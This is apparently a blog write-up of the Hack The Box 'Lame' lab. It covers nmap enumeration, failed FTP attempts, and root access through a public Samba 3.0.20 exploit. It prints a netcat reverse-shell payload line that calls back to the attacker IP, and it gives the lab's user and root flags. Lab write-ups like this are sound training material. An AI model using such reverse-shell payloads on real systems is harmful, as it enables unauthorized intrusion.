Hackthebox – Lame – Writeup

Recon

What we know before interacting with the box:

  • Name: LAME
  • IP: 10.10.10.3
  • Level: Very easy
  • OS: Linux
  • Flag: 2 (User and Root Flag)
  • Common and real world vulnerability. Maybe related to previous Box.
  • Attacker IP: 10.10.16.223

Enumeration

First, give it an initial nmap enumeration

nmap -sV -A 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|   OS: Unix (Samba 3.0.20-Debian)
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-08-26T13:12:53-04:00

Recap

– Domain: hackthebox.gr

– vsftpd 2.3.4running on port 21

– SSH 4.7p1 running on port 22

– And 139,445 ports serve SMB à This is not SMB service on Windows but on Linux. And the service used here is Samba smbd 3.0.20-Debian

Pentest FTP

As FTP supports anonymous login, I have a go at this FTP connection.

          (kali) ftp 10.10.10.3

Look like some filters prevent me from accessing data. Nothing’s here.

Search for exploit vsftpd 2.3.4  on google.

Tried a python script exploit for vsftpd but not work

Pentest SMB

I used smbmap to check for public share.

Well, we can READ,WRITE to tmp. I used smbclient to acess this folder but got error.

Search for this error message on google and I found one solution

Now smbclient works properly

Check for files on tmp folder, but got no useful information.

Exploit Samba 3.0.20

Search for exploit Samba version 3.0.20 on google and I found a python script macha97/exploit-smb-3.0.20 – GitHub

This script requires a payload created from msfvenom

This buf string actually is just a Bash reverse shell:

          (buf) mkfifo /tmp/cewoh; nc 10.10.16.223 4444 0</tmp/cewoh | /bin/sh >/tmp/cewoh 2>&1; rm /tmp/cewoh

The complete exploit script is like

Use python3 to run it

And I got shell from netcat listener

Greatly, my shell is already root. Go get user flag and root flag at once. There’s several users at /home

I find for .txt file for quickly get user flag.

(user flag) 83f38774483206d7c54299b9dd2e3a89

And the root flag is at /root/root.txt as usual

(root flag) 3bc8b537695679e5eb8cb0aeb9e2cb13

Lessons learned

  • SMB service (port 139,445 open) also exists on Linux.
  • Samba 3.0.20 is vulnerable to such a critical bug as it could lead to RCE as ROOT.

References

https://book.hacktricks.xyz/pentesting/pentesting-ftp

https://book.hacktricks.xyz/pentesting/pentesting-smb

https://serverfault.com/questions/137135/what-does-nt-status-bad-network-name-mean-in-samba

https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

Related Post

Trả lời

Email của bạn sẽ không được hiển thị công khai.